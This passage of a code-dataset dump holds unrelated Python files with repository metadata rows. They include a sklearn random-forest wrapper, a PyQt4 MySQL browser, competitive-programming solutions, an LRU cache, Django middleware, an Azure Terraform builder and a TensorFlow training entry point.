    "min_samples_leaf": 1,
    "min_weight_fraction_leaf": 0.,
    "max_features": "auto",
    "max_leaf_nodes": None,
    "min_impurity_decrease": 0.,
    "min_impurity_split": None,
    "bootstrap": True,
    "oob_score": False,
    "n_jobs": None,
    "random_state": None,
    "warm_start": False}
# Default tuning routine: integer search bounds for the tuned
# hyper-parameters plus the optimiser ("gp_minimize") configuration.
DEFAULT_RFR_ROUTINES = dict(
    intermediate=[
        {"integer__n_estimators": (200, 2000),
         "integer__max_depth": (10, 100),
         "integer__min_samples_leaf": (1, 4),
         "_optimiser__name": "gp_minimize",
         "_optimiser__kwargs": {"n_calls": 12, "n_random_starts": 4}
         }
    ]
)
def _model_cls_(all_params):
    """Instantiate a RandomForestRegressor from a flat parameter dict.

    NOTE(review): this reads all_params["verbose"], which is absent from
    DEFAULT_RFR_PARAMS above -- callers must supply it or a KeyError
    results.
    """
    return sklearnRFR(n_estimators=all_params["n_estimators"],
                      criterion=all_params["criterion"],
                      max_depth=all_params["max_depth"],
                      min_samples_split=all_params["min_samples_split"],
                      min_samples_leaf=all_params["min_samples_leaf"],
                      min_weight_fraction_leaf=all_params[
                          "min_weight_fraction_leaf"],
                      max_features=all_params["max_features"],
                      max_leaf_nodes=all_params["max_leaf_nodes"],
                      min_impurity_decrease=all_params[
                          "min_impurity_decrease"],
                      min_impurity_split=all_params["min_impurity_split"],
                      bootstrap=all_params["bootstrap"],
                      oob_score=all_params["oob_score"],
                      n_jobs=all_params["n_jobs"],
                      random_state=all_params["random_state"],
                      verbose=all_params["verbose"],
                      warm_start=all_params["warm_start"])
class RandomForestRegression(SurrogateModelBaseRegression):
    """Surrogate-model wrapper around sklearn's RandomForestRegressor."""

    def __init__(self, static_params=None):
        super().__init__(routines=DEFAULT_RFR_ROUTINES,
                         hyperparams_default=DEFAULT_RFR_PARAMS,
                         hyperparams_static=static_params)
        self._model_cls = sklearnRFR

    def __str__(self):
        # The underlying sklearn class is RandomForestRegressor; the previous
        # text said "RandomForestRegression", which does not exist in sklearn
        # (see the import of RandomForestRegressor at the top of this file).
        return "Random Forest Regression (sklearn.ensemble." \
               "RandomForestRegressor)"

    def copy_model(self, model, **kwargs):
        """Return the model to use as a "copy".

        Parameters
        ----------
        model
            The estimator to copy.

        Returns
        -------
        The model itself (no deep copy is performed).
        """
        return model
| [
"g.h.garrett13@gmail.com"
] | g.h.garrett13@gmail.com |
2e9a186467e3f17ea0677fcfe75b85d6b1ce018d | 885303f19848405485a210100ac26f6e776113bb | /chapter12/GUI/callDispProducts.pyw | 8c66307569b8c2de963548b9b5d11c1e1531146f | [] | no_license | Rabidza/INF2611 | cc2120d56c918da23ed4c5e01dc0a753e9fd1fd7 | 24e9b9c52ab831e6f30042ad2ef293b448d98dc6 | refs/heads/master | 2020-03-20T02:38:35.092322 | 2018-09-24T15:31:40 | 2018-09-24T15:31:40 | 137,118,288 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,339 | pyw | import sys
from DispProducts import *
from PyQt4 import QtSql, QtGui
from chapter12 import settings
def createConnection():
    """Open the application's global MySQL connection via QtSql.

    Returns the actual result of ``db.open()``; the previous version always
    returned True, which made the caller's failure check
    (``if not createConnection(): sys.exit(1)``) dead code.
    """
    db = QtSql.QSqlDatabase.addDatabase("QMYSQL")
    db.setHostName(settings.HOST)
    db.setDatabaseName(settings.DATABASE)
    db.setUserName(settings.USER)
    db.setPassword(settings.PASSWORD)
    ok = db.open()
    # Surface the driver error text (empty when the open succeeded).
    print(db.lastError().text())
    return ok
class MyForm(QtGui.QDialog):
    """Dialog that pages through the rows of the `products` table."""

    recno = 0  # index of the record currently shown (shared navigation state)

    def __init__(self, parent=None):
        QtGui.QWidget.__init__(self, parent)
        self.ui = Ui_Dialog()
        self.ui.setupUi(self)
        self.model = QtSql.QSqlQueryModel(self)
        self.model.setQuery("SELECT * FROM products")
        self._showRecord(0)
        # Wire the navigation buttons to their handlers.
        QtCore.QObject.connect(self.ui.FirstButton, QtCore.SIGNAL("clicked()"),
                               self.dispFirst)
        QtCore.QObject.connect(self.ui.PreviousButton, QtCore.SIGNAL("clicked()"),
                               self.dispPrevious)
        QtCore.QObject.connect(self.ui.LastButton, QtCore.SIGNAL("clicked()"),
                               self.dispLast)
        QtCore.QObject.connect(self.ui.NextButton, QtCore.SIGNAL("clicked()"),
                               self.dispNext)

    def _showRecord(self, index):
        """Fetch record `index` from the model and display its fields.

        Replaces four copy-pasted fetch-and-display sequences in the
        navigation handlers below.
        """
        self.record = self.model.record(index)
        self.ui.prodid.setText(str(self.record.value("prod_id")))
        self.ui.prodname.setText(str(self.record.value("prod_name")))
        self.ui.qty.setText(str(self.record.value("quantity")))
        self.ui.price.setText(str(self.record.value("price")))

    def dispFirst(self):
        """Show the first record."""
        MyForm.recno = 0
        self._showRecord(MyForm.recno)

    def dispPrevious(self):
        """Show the previous record, wrapping around to the last one."""
        MyForm.recno -= 1
        if MyForm.recno < 0:
            MyForm.recno = self.model.rowCount() - 1
        self._showRecord(MyForm.recno)

    def dispLast(self):
        """Show the last record."""
        MyForm.recno = self.model.rowCount() - 1
        self._showRecord(MyForm.recno)

    def dispNext(self):
        """Show the next record, wrapping around to the first one."""
        MyForm.recno += 1
        if MyForm.recno > self.model.rowCount() - 1:
            MyForm.recno = 0
        self._showRecord(MyForm.recno)
if __name__ == "__main__":
    # Launch the Qt application; bail out if the database cannot be opened.
    app = QtGui.QApplication(sys.argv)
    if not createConnection():
        sys.exit(1)
    myapp = MyForm()
    myapp.show()
    sys.exit(app.exec_())
| [
"neillhenning@gmail.com"
] | neillhenning@gmail.com |
0d2ff7147b9af069b96b1cdd823195b2d2617120 | d820c8efb25c9adb77015650a0f7dc6f1e983bfe | /abc/abc114_c.py | 10c62426f6542d1d4ff29bb49808e1bfbea68b22 | [] | no_license | toshikish/atcoder | 73fdaa2310f23f846279f9f7466bdb969448371f | 33676630d6820dd92ccf0931425b8906b065bedd | refs/heads/master | 2022-05-16T20:00:52.665762 | 2022-04-02T11:55:44 | 2022-04-02T11:55:44 | 173,099,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | N = int(input())
def dfs(s):
    """Count numbers <= N, reachable by extending prefix `s` with the
    digits 7/5/3, that contain each of those digits at least once.

    Relies on the module-level bound N read from stdin.
    """
    if int(s) > N:
        return 0
    total = 1 if all(digit in s for digit in '753') else 0
    for digit in '753':
        total += dfs(s + digit)
    return total
print(dfs('0'))
| [
"toshiki@nanshika.com"
] | toshiki@nanshika.com |
bbaaf7c75067a4c26aed3aed58d0409cdb84e268 | d2332604fc80b6d622a263b2af644425a7e703de | /top_interview_questions/math/6_divide_two_integers.py | 533e4903124f79edaa24c2c9ee56c21793dbf652 | [] | no_license | abhijitdey/coding-practice | b3b83a237c1930266768ce38500d6812fc31c529 | 6ae2a565042bf1d6633cd98ed774e4a77f492cc8 | refs/heads/main | 2023-08-14T23:31:06.090613 | 2021-10-18T21:35:56 | 2021-10-18T21:35:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,737 | py | def divide(self, dividend: int, divisor: int) -> int:
    # Constants for the 32-bit signed range the problem restricts results to.
    MAX_INT = 2147483647  # 2**31 - 1
    MIN_INT = -2147483648  # -2**31
    HALF_MIN_INT = -1073741824  # MIN_INT // 2
    # Special case: MIN_INT / -1 is the one overflow; clamp it to MAX_INT.
    if dividend == MIN_INT and divisor == -1:
        return MAX_INT
    # Normalise both operands to negatives (negatives can represent MIN_INT,
    # positives cannot) and count how many sign flips that takes.
    negatives = 2
    if dividend > 0:
        negatives -= 1
        dividend = -dividend
    if divisor > 0:
        negatives -= 1
        divisor = -divisor
    doubles = []
    powersOfTwo = []
    # Repeatedly double the divisor, memoising each double alongside the
    # power of two it represents, while its magnitude still fits within
    # the dividend's magnitude (both values are negative here).
    powerOfTwo = 1
    while divisor >= dividend:
        doubles.append(divisor)
        powersOfTwo.append(powerOfTwo)
        # Stop doubling before the next step could underflow past MIN_INT.
        if divisor < HALF_MIN_INT:
            break
        divisor += divisor  # Double divisor
        powerOfTwo += powerOfTwo
    # Go from largest double to smallest, checking if the current double fits
    # into the remainder of the dividend.
    quotient = 0
    for i in reversed(range(len(doubles))):
        if doubles[i] >= dividend:
            # If it does fit, add the current powerOfTwo to the quotient.
            quotient += powersOfTwo[i]
            # Update dividend to take into account the bit we've now removed.
            dividend -= doubles[i]
    # Exactly one original negative sign means the quotient stays negative;
    # otherwise flip it back to positive.
    return quotient if negatives != 1 else -quotient
| [
"ashiz2013@gmail.com"
] | ashiz2013@gmail.com |
2868f60f8010ce7f44464f510a83a6dec6145354 | 578f4950b843c2b0a199d9dbcbb99c6148483b40 | /pytext/models/embeddings/contextual_token_embedding.py | 93be4ec0374dc6a5a9d24c1e5e480d14e7012510 | [
"BSD-3-Clause"
] | permissive | appatsekhar/pytext | 2a9725cb3eb8c3283587777873b241d9244c6b34 | f82830da00339392fd17c70572cf1920262d6d74 | refs/heads/master | 2020-08-06T11:20:21.065498 | 2019-10-04T22:35:46 | 2019-10-04T22:37:00 | 212,957,720 | 3 | 0 | NOASSERTION | 2019-10-05T06:56:14 | 2019-10-05T06:56:13 | null | UTF-8 | Python | false | false | 1,522 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch
from pytext.config.field_config import ContextualTokenEmbeddingConfig
from .embedding_base import EmbeddingBase
class ContextualTokenEmbedding(EmbeddingBase):
    """Module for providing token embeddings from a pretrained model."""

    Config = ContextualTokenEmbeddingConfig

    @classmethod
    def from_config(cls, config: ContextualTokenEmbeddingConfig, *args, **kwargs):
        # Only the embedding width is needed at construction time.
        return cls(config.embed_dim)

    def forward(self, embedding: torch.Tensor) -> torch.Tensor:
        """Unflatten a (batch_size, seq_len * embedding_dim) tensor into
        (batch_size, seq_len, embedding_dim).

        Raises ValueError when the flattened width is not a multiple of
        ``self.embedding_dim``.  Shape arithmetic uses the
        torch.onnx.operators helpers so it stays traceable for ONNX export.
        """
        embedding_shape = torch.onnx.operators.shape_as_tensor(embedding)
        # Since embeddings vector is flattened, verify its shape correctness.
        if embedding_shape[1].item() % self.embedding_dim != 0:
            raise ValueError(
                f"Input embedding_dim {embedding_shape[1]} is not a"
                + f" multiple of specified embedding_dim {self.embedding_dim}"
            )
        # Unflatten embedding Tensor from (batch_size, seq_len * embedding_size)
        # to (batch_size, seq_len, embedding_size).
        num_tokens = embedding_shape[1] // self.embedding_dim
        new_embedding_shape = torch.cat(
            (
                torch.LongTensor([-1]),  # -1 lets reshape infer the batch size
                num_tokens.view(1),
                torch.LongTensor([self.embedding_dim]),
            )
        )
        return torch.onnx.operators.reshape_from_tensor_shape(
            embedding, new_embedding_shape
        )
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
eb353673048b1119249215a1b55d0f840e72568b | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_atomic.py | 35cc43462c3df24a4ec447fb1d31a5b6264c1ffa | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py |
# class header
class _ATOMIC():
    """Word-knowledge entry for the adjective "ATOMIC" (generated wordbase)."""
    def __init__(self,):
        self.name = "ATOMIC"
        self.definitions = [u'relating to atoms: ', u'using the energy that is created when an atom is divided: ']
        self.parents = []
        self.childen = []  # NOTE(review): likely a typo for "children"; kept for compatibility
        self.properties = []
        self.jsondata = {}
        self.specie = 'adjectives'
    def run(self, obj1, obj2):
        """Record an entry for `obj2` whose 'properties' field is the
        lowercased word name, and return the accumulated jsondata dict."""
        self.jsondata[obj2] = {}
        self.jsondata[obj2]['properties'] = self.name.lower()
        return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
f28483dc2e673080f7855f8385ce80201400739e | cbda89443b351bb2047180dad4e300c13dc3df7f | /CalcPol/nTs_multipars.py | ebfe87a269d2f475191ac7edc591eb6f08108575 | [] | no_license | sheridanfew/pythonpolarisation | 080f52979f98d26360a46412a10c8e3f51ee4549 | 178e2684e9a239a8e60af5f7b1eb414ac5f31e92 | refs/heads/master | 2021-07-10T01:07:40.978790 | 2021-03-11T16:56:37 | 2021-03-11T16:56:37 | 96,101,351 | 0 | 0 | null | 2017-07-03T13:37:06 | 2017-07-03T10:54:52 | null | UTF-8 | Python | false | false | 3,447 | py | import sys
sys.path.append('../')
from BasicElements import *
from BasicElements.Register import GetRegister
from BasicElements.MoleculeFactory import ReadMoleculeType
from BasicElements.MoleculeFactory import GetMolecule
from BasicElements.Crystal import *
from Polarizability.GetDipoles import get_dipoles,split_dipoles_onto_atoms
from Polarizability import *
from Polarizability.GetEnergyFromDips import *
from Polarizability.JMatrix import JMatrix
import numpy as np
from math import *
from time import gmtime, strftime
import os
# Timestamp the run, then open the summary CSV and write its header row
# (tab-separated polarisability columns per molecule length).  Python 2.
print strftime("%a, %d %b %Y %X +0000", gmtime())
basename='nTs'
g = open('Polarisabilities_%s.csv' % basename, 'w')
g.write(basename)
g.write('\nLength\tMethod\tFit\tLong_calpol\tLong_pypol\tLong_ratio\tShort_calpol\tShort_pypol\tShort_ratio\tFace_calpol\tFace_pypol\tFace_ratio')
for method in ['Lin','Exp']:
for fit in ['components', 'mean', 'empirical']:
name=basename + '_' + method + '_' + fit
f = open('properies_%s.dat' % name, 'w')
f.write(name)
for n in range(1,9,1):
print 'N', n, ' Namefile: ', name
exec( "from Molecules.pol_thio_" + str(n) + "T_neut import pol")
calpol=pol
calpoldiag=list(np.diag(calpol))
calpol_max = max(calpoldiag)
calpol_max_index = calpoldiag.index(calpol_max)
calpol_min = min(calpoldiag)
calpol_min_index = calpoldiag.index(calpol_min)
calpol_thirdindex=[v for v in [0,1,2] if not ( v == calpol_max_index or v == calpol_min_index)][0]
namefile= str( 'thio_' + str(n) + 'T_neut_aniso_chelpg_thole_' + method + '_' + fit + '.xyz' )
ReadMoleculeType('../Molecules/' + namefile)
mol = GetMolecule('../Molecules/' + namefile)
jm=JMatrix(jmtype='Thole' + method + 'Iso')
pypol=np.matrix([[0.,0.,0.],[0.,0.,0.],[0.,0.,0.]])
etamat=np.matrix([[0.,0.,0.],[0.,0.,0.],[0.,0.,0.]])
for i in np.arange(0. ,2.1 ,1. ):
E0 = np.matrix([0.,0.,0.])
E0[0,i]=1.
d = get_dipoles(E0=E0,jm=jm._m)
split_d = split_dipoles_onto_atoms(d)
tot = np.matrix([0.,0.,0.])
for dd in split_d:
tot += dd
print 'tot'
print tot
pypol.T[i] = tot
pypoldiag=list(np.diag(pypol))
etamat=np.multiply((pypol-calpol),(pypol-calpol))/np.multiply(calpol,calpol)
ratios=np.divide(pypol,calpol)
ratiosdiag=list(np.diag(ratios))
g.write('\n' + str(n) + '\t' + method + '\t' + fit + '\t' + str(calpoldiag[calpol_max_index]) + '\t' + str(pypoldiag[calpol_max_index]) + '\t' + str(ratiosdiag[calpol_max_index]) + '\t' + str(calpoldiag[calpol_thirdindex]) + '\t' + str(pypoldiag[calpol_thirdindex]) + '\t' + str(ratiosdiag[calpol_thirdindex]) + '\t' + str(calpoldiag[calpol_min_index]) + '\t' + str(pypoldiag[calpol_min_index]) + '\t' + str(ratiosdiag[calpol_min_index]))
# If calibration polarisability is 0, eta not appropriate fit here (and previous funct will have made undefined), set value in etamat to 0
for i in np.arange(0,3,1):
for j in np.arange(0,3,1):
if calpol[i,j] == 0:
etamat[i,j] = '0'
eta=0
eta = etamat[0,0]+etamat[1,0]+etamat[1,1]+etamat[2,0]+etamat[2,1]+etamat[2,2]
print 'namefile: ', namefile
print 'eta', eta
print '\ncalpol:\n'
print calpol
print '\npypol\n'
print pypol
f.write(str(n) + '\nNamefile:' + namefile + '\n\nRatios:\n' + str(ratios) + '\n\nCalpol:\n' + str(calpol) + '\n\nPypol:\n' + str(pypol) + '\n\n')
f.flush()
f.close()
g.flush()
g.close()
print 'Job Completed Successfully.'
| [
"sheridan.few@gmail.com"
] | sheridan.few@gmail.com |
89d2637b7ecb3c046c9cf2ac5e189c50f8e4d35d | 54d2887e3c910f68366bd0aab3c692d54245e22a | /abc/abc_001_041/abc011/d.py | 723dc876991401fff8adfa9d7cf1dbf1fa1fc016 | [] | no_license | Kevinrobot34/atcoder | 7aec367fd2c6b589e9d583dae7b3c7520ce9fa12 | 482ea508f098f81e4f19522fe518dd22c781aca9 | refs/heads/master | 2022-07-10T23:44:45.290022 | 2022-06-29T11:30:26 | 2022-06-29T11:30:26 | 158,081,477 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | def comb(n: int, k: int) -> int:
if n < k or n < 0 or k < 0:
return 0
k = min(k, n - k)
ans = 1
for i in range(1, k + 1):
ans *= n - i + 1
ans //= i
return ans
# Read the number of moves n, step size d, and the target point (x, y).
n, d = map(int, input().split())
x, y = map(int, input().split())
if x % d == 0 and y % d == 0:
    # Work in units of d-length steps.
    x //= d
    y //= d
    ans = 0.0
    for nx in range(n + 1):
        ny = n - nx
        # nx steps along the x-axis, ny along the y-axis; parity and range
        # checks rule out splits that cannot reach (x, y).
        if (nx + x) % 2 != 0:
            continue
        if (ny + y) % 2 != 0:
            continue
        if x > nx:
            continue
        if y > ny:
            continue
        nx_p = (nx + x) // 2
        ny_p = (ny + y) // 2
        # print(n, nx, nx_p, ny, ny_p)
        # Probability of this axis split times the ways to pick the
        # positive-direction steps on each axis (4 directions per move).
        tmp = comb(n, nx) / (4**n)
        tmp *= comb(nx, nx_p)
        tmp *= comb(ny, ny_p)
        ans += tmp
else:
    # Unreachable unless both coordinates are multiples of d.
    ans = 0.0
print(ans)
| [
"kevinrobot34@yahoo.co.jp"
] | kevinrobot34@yahoo.co.jp |
c5eb61801d7b041d9a1c3f7598d72a8cec4b843b | 27f7a9849d9c3f2c6b3607a7233bf73a49f62348 | /146.LRU_Cache.py | 3a5aa1399a641fd70c13232abe6f6663134c8e9e | [] | no_license | welsny/solutions | 32dcd878e2842e76bd6519d93b22a4990b87a28b | f4cd43f082b58d4410008af49325770bc84d3aba | refs/heads/master | 2021-06-05T04:21:28.880359 | 2020-04-21T14:49:50 | 2020-04-21T14:49:50 | 69,113,825 | 1 | 0 | null | 2020-04-21T14:49:51 | 2016-09-24T16:27:52 | Python | UTF-8 | Python | false | false | 1,357 | py | #!/usr/bin/env python3
class Node:
    """Singly linked list node holding one cached key/value pair."""
    def __init__(self, key, val, next=None):
        self.key = key
        self.val = val
        self.next = next  # following node in the list, or None at the tail
class LRUCache:
    """LRU cache over a singly linked list kept in access order.

    Invariant: ``self.d`` maps each cached key to the PREDECESSOR of the
    node holding that key, which lets a node be unlinked without a doubly
    linked list.  ``self.head`` is a sentinel (head.next is the least
    recently used entry); ``self.curr`` is the tail, i.e. the most
    recently used node.
    """
    def __init__(self, capacity: int):
        head = Node(None, None)  # sentinel node; real entries start at head.next
        self.head = head
        self.curr = head  # tail pointer (most recently used node)
        self.cap = capacity
        self.d = {}  # key -> predecessor of the node that holds key
    def put(self, key: int, value: int) -> None:
        if key in self.d:
            # Overwrite in place, then touch the key to mark it most recent.
            self.d[key].next.val = value
            self.get(key)
            return
        # Append a fresh node at the tail.
        node = Node(key, value)
        self.d[key] = self.curr
        self.curr.next = node
        self.curr = node
        if len(self.d) > self.cap:
            # Evict the oldest entry (the node right after the sentinel).
            node = self.head.next
            del self.d[node.key]
            self.head.next = node.next
            # The survivor's predecessor is now the sentinel.
            self.d[node.next.key] = self.head
    def get(self, key: int) -> int:
        if key not in self.d:
            return -1
        prev, node = self.d[key], self.d[key].next
        if self.curr != node:
            # Unlink the node and re-append it at the tail, updating the
            # predecessor map for both affected neighbours.
            prev.next = node.next
            self.d[node.next.key] = prev
            self.curr.next = node
            self.d[node.key] = self.curr
            node.next = None
            self.curr = node
        return node.val
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
| [
"zengw@mssm.org"
] | zengw@mssm.org |
4b6f6c167b59f0873d8f3a739cdb2949a0a0ffb7 | 6a1081f3db1e98cb29e67da6d7041388d3cf2f52 | /survey/middleware.py | fbc8097435ea7882f156c4894ddb729c614240a9 | [
"MIT"
] | permissive | watchdogpolska/ankieta-rodzic-po-ludzku-nfz | 5b3827d10b3c5221bc4374c69fd4e19c8f296620 | 68b1d1ccac969ca51416761d1168678effb1e6c6 | refs/heads/master | 2021-01-20T10:32:20.075351 | 2016-12-02T02:17:50 | 2016-12-02T02:17:50 | 74,078,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | from django.utils.deprecation import MiddlewareMixin
class ForceDefaultLanguageMiddleware(MiddlewareMixin, object):
    """
    Ignore Accept-Language HTTP headers.

    Forces the I18N machinery to always choose settings.LANGUAGE_CODE as the
    default initial language unless another one is set via sessions or
    cookies.  Must be installed *before* any middleware that reads
    request.META['HTTP_ACCEPT_LANGUAGE'], namely
    django.middleware.locale.LocaleMiddleware.
    """
    def process_request(self, request):
        # Remove the header when present; pop() is a no-op otherwise.
        request.META.pop('HTTP_ACCEPT_LANGUAGE', None)
class XForwardedForMiddleware(MiddlewareMixin, object):
    """Restore REMOTE_ADDR from X-Forwarded-For when behind a proxy.

    Applies only when REMOTE_ADDR is missing or falsy and an
    X-Forwarded-For header is present; the first address in the header
    becomes REMOTE_ADDR.
    """
    def process_request(self, request):
        meta = request.META
        if "HTTP_X_FORWARDED_FOR" in meta and not meta.get("REMOTE_ADDR", False):
            # Preserve the proxy's own address, if one was set at all.
            # (The previous version read meta["REMOTE_ADDR"] unconditionally
            # and raised KeyError when the key was absent.)
            if "REMOTE_ADDR" in meta:
                meta["HTTP_X_PROXY_REMOTE_ADDR"] = meta["REMOTE_ADDR"]
            parts = meta["HTTP_X_FORWARDED_FOR"].split(",", 1)
            meta["REMOTE_ADDR"] = parts[0]
| [
"naczelnik@jawnosc.tk"
] | naczelnik@jawnosc.tk |
88a3b065af89c241bf090090b2dac18b3996945a | f3d38d0e1d50234ce5f17948361a50090ea8cddf | /백준/Silver/Silver 5/20411번 ; 추첨상 사수 대작전! (Normal).py | cfdf13c3ce3e1479bf025821524fe12ff4bc6d7c | [] | no_license | bright-night-sky/algorithm_study | 967c512040c183d56c5cd923912a5e8f1c584546 | 8fd46644129e92137a62db657187b9b707d06985 | refs/heads/main | 2023-08-01T10:27:33.857897 | 2021-10-04T14:36:21 | 2021-10-04T14:36:21 | 323,322,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | # https://www.acmicpc.net/problem/20411
from sys import stdin
m, Seed, X1, X2 = map(int, stdin.readline().split(' '))
a, c = 1, 1
ac_founded = False
for a in range(0, m):
for c in range(0, m):
if X1 == (a * Seed + c) % m and X2 == (a * X1 + c) % m:
print(a, c)
ac_founded = True
break
if ac_founded:
break | [
"bright_night_sky@naver.com"
] | bright_night_sky@naver.com |
6be5d424f2c64add9c3d0e6b9bdac6fb207e8c77 | 0ed9a8eef1d12587d596ec53842540063b58a7ec | /cloudrail/knowledge/context/azure/resources_builders/terraform/function_app_builder.py | 0fd39b1b2470cd6bae0490d4302a2981b27d133e | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | cbc506/cloudrail-knowledge | 8611faa10a3bf195f277b81622e2590dbcc60da4 | 7b5c9030575f512b9c230eed1a93f568d8663708 | refs/heads/main | 2023-08-02T08:36:22.051695 | 2021-09-13T15:23:33 | 2021-09-13T15:24:26 | 390,127,361 | 0 | 0 | MIT | 2021-07-27T21:08:06 | 2021-07-27T21:08:06 | null | UTF-8 | Python | false | false | 1,015 | py | from cloudrail.knowledge.context.azure.resources.constants.azure_resource_type import AzureResourceType
from cloudrail.knowledge.context.azure.resources.webapp.azure_function_app import AzureFunctionApp
from cloudrail.knowledge.context.azure.resources.webapp.constants import FieldMode
from cloudrail.knowledge.context.azure.resources_builders.terraform.azure_terraform_builder import AzureTerraformBuilder
class FunctionAppBuilder(AzureTerraformBuilder):
def do_build(self, attributes: dict):
client_cert_mode: FieldMode = None
if self._is_known_value(attributes, 'client_cert_mode'):
client_cert_mode = FieldMode(attributes['client_cert_mode'])
return AzureFunctionApp(name=attributes['name'],
client_cert_mode=client_cert_mode,
https_only=self._get_known_value(attributes, 'https_only', False))
def get_service_name(self) -> AzureResourceType:
return AzureResourceType.AZURERM_FUNCTION_APP
| [
"ori.bar.emet@gmail.com"
] | ori.bar.emet@gmail.com |
a56065794e6125d049d8c77b43c8f19352abf99c | 4950b0412d5a764075af0d6bdfb95c1a6fcc971a | /core/src/main/python/akdl/entry/base_entry.py | 54f048a7a0b7d058cdc56c1d7f2c7462bde0f3d6 | [
"Apache-2.0"
] | permissive | zhu1971/Alink | 7cae17e0fad1ca3efd940299e76042e22df9611a | d600bbf215c16b710d99b9b2404fc3da3e508997 | refs/heads/master | 2023-08-29T20:06:12.148089 | 2021-11-02T03:55:42 | 2021-11-02T03:55:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,461 | py | import abc
from typing import Dict, Callable
import tensorflow as tf
from flink_ml_framework.context import Context
from flink_ml_framework.java_file import *
from ..runner import tf_helper, io_helper
from ..runner.output_writer import DirectOutputWriter
try:
from flink_ml_tensorflow.tensorflow_context import TFContext
except:
from flink_ml_tensorflow2.tensorflow_context import TFContext
# noinspection PyUnresolvedReferences
from tensorflow_io.core.python.ops import core_ops
__all__ = ['TF1_TYPE', 'TF2_TYPE']
TF1_TYPE = 'tf1'
TF2_TYPE = 'tf2'
class BaseEntry(abc.ABC):
def __init__(self, func_name, engine_type):
self.func_name = func_name
self.engine_type = engine_type
@staticmethod
def get_func_by_name(func_name):
"""
Get function by the func name
:param func_name: func name
:return: function
"""
if '.' not in func_name:
if func_name in globals():
return globals()[func_name]
else:
raise RuntimeError('cannot find function[{}]'.format(func_name))
else:
module_name, func_name = func_name.rsplit('.', 1)
import importlib
# load the module, will raise ImportError if module cannot be loaded
m = importlib.import_module(module_name)
# get the class, will raise AttributeError if class cannot be found
c = getattr(m, func_name)
return c
@abc.abstractmethod
def construct_args(self, **kwargs):
pass
def is_batch(self):
return True
def post_process(self, **kwargs):
pass
def entry_func(self, context: Context):
tf_context = TFContext(context)
properties = tf_context.properties
print('properties', properties, flush=True)
# intra_op_parallelism is set by akdl, because there is a bug in TensorFlow 1.x
# See: https://stackoverflow.com/questions/34426268/restricting-number-of-cores-used
intra_op_parallelism = int(properties['ALINK:intra_op_parallelism'])
if self.engine_type == TF1_TYPE:
tf_helper.set_intra_op_parallelism(intra_op_parallelism_threads=intra_op_parallelism)
elif self.engine_type == TF2_TYPE:
tf.config.threading.set_intra_op_parallelism_threads(intra_op_parallelism)
num_workers = int(properties['ALINK:num_workers'])
work_dir = properties['ALINK:work_dir']
cluster, task_type, task_index = tf_context.export_estimator_cluster()
if self.is_batch():
java_queue_file = JavaFile(context.from_java(), context.to_java())
dataset_file = os.path.join(work_dir, 'dataset.tfrecords')
dataset, dataset_length = io_helper.convert_java_queue_file_to_repeatable_dataset(java_queue_file,
dataset_file)
print("number of records: " + str(dataset_length), flush=True)
dataset_fn: Callable[[], tf.data.TFRecordDataset] = lambda: tf.data.TFRecordDataset(dataset_file)
else:
dataset_fn: Callable[[], tf.data.TFRecordDataset] = lambda: tf_context.flink_stream_dataset()
dataset = None
dataset_file = None
dataset_length = None
saved_model_dir = os.path.join(work_dir, 'savedmodel')
user_params: Dict = json.loads(properties['ALINK:user_defined_params'])
for i in range(1, 1024):
key = "ALINK:bc_" + str(i)
if key in properties:
user_params[key] = context.properties[key]
key = "ALINK:model_dir"
if key in properties:
user_params[key] = properties[key]
output_writer = DirectOutputWriter(tf_context.from_java(), tf_context.to_java())
locals_copy = locals().copy()
locals_copy.pop("self")
print("locals_copy = ", locals_copy, flush=True)
args = self.construct_args(**locals_copy)
func = self.get_func_by_name(self.func_name)
func(args)
print("task_type = {}, task_index = {}: done tf_user_main".format(task_type, task_index), flush=True)
local_vars = locals().copy()
local_vars.pop('self')
self.post_process(**local_vars)
print("task_type = {}, task_index = {}: exit".format(task_type, task_index), flush=True)
output_writer.close()
| [
"shaomeng.wang.w@gmail.com"
] | shaomeng.wang.w@gmail.com |
ebd96c8b735de3f30f45191d761b2314a815da03 | bf0e884ed3c9b57d0bc022c45b4bd50f7f5ba34a | /tomheon/day16/day16-1.py | 35f010badc8a70fc58d03b9433adaa3d8b05f42c | [
"MIT"
] | permissive | sean-hart/advent2020 | 8db117f3e778ec8044e97ce8a0d17edeb6351415 | 1174afcedf9a8db5134803869e63ea182637fc29 | refs/heads/main | 2023-02-07T15:52:57.956987 | 2020-12-27T00:42:55 | 2020-12-27T00:42:55 | 317,643,649 | 0 | 8 | MIT | 2020-12-27T00:42:56 | 2020-12-01T19:17:17 | Python | UTF-8 | Python | false | false | 1,704 | py | import sys
from itertools import takewhile, dropwhile
class Rule:
def __init__(self, field, ranges):
self.field = field
self.ranges = ranges
def __repr__(self):
return f'Rule {self.field} {self.ranges}'
def is_valid(self, value):
return any([lower <= value <= upper for (lower, upper) in self.ranges])
def parse_range(r):
return tuple([int(i) for i in r.split('-')])
def parse_rule(raw_rule):
field, raw_range_opts = raw_rule.split(':')
raw_ranges = raw_range_opts.split(' or ')
ranges = [parse_range(r) for r in raw_ranges]
return Rule(field, ranges)
def parse_rules(instream):
raw_rules = [line.strip() for line in takewhile(lambda l: l.strip(), instream)]
